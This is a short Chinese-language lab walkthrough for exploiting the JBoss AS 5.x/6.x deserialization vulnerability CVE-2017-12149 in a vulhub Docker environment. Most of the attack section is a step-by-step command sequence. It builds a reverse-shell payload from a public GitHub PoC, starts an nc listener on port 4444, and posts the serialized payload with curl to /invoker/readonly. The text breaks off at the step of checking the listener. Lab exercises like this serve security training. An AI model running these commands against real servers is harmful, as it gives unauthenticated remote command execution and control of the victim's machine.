一:漏洞说明
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。
二、影响的版本
5.x和6.x版本的JBOSSAS
三、环境搭建(目标机:192.168.33.144)
利用vulhub搭建环境
1、进入漏洞目录
cd /vulhub/jboss/CVE-2017-12149
2、搭建环境
docker-compose up -d
3、成功访问:http://you-ip:8080,环境搭建成功
四、攻击(攻击机:192.168.33.135)
1、在GitHub上面下载我们需要的漏洞poc
git clone https://github.com/joaomatosf/JavaDeserH2HC
2、进入JavaDeserH2HC目录下,然后下载执行生成二进制的payload文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
3、设置接受shell的主机IP和端口
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机ip:4444
4、监听端口。
nc -lvvp 4444
5、向被攻击服务器发送攻击Payload。
curl http://目标机ip:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
6、查看监听结果‘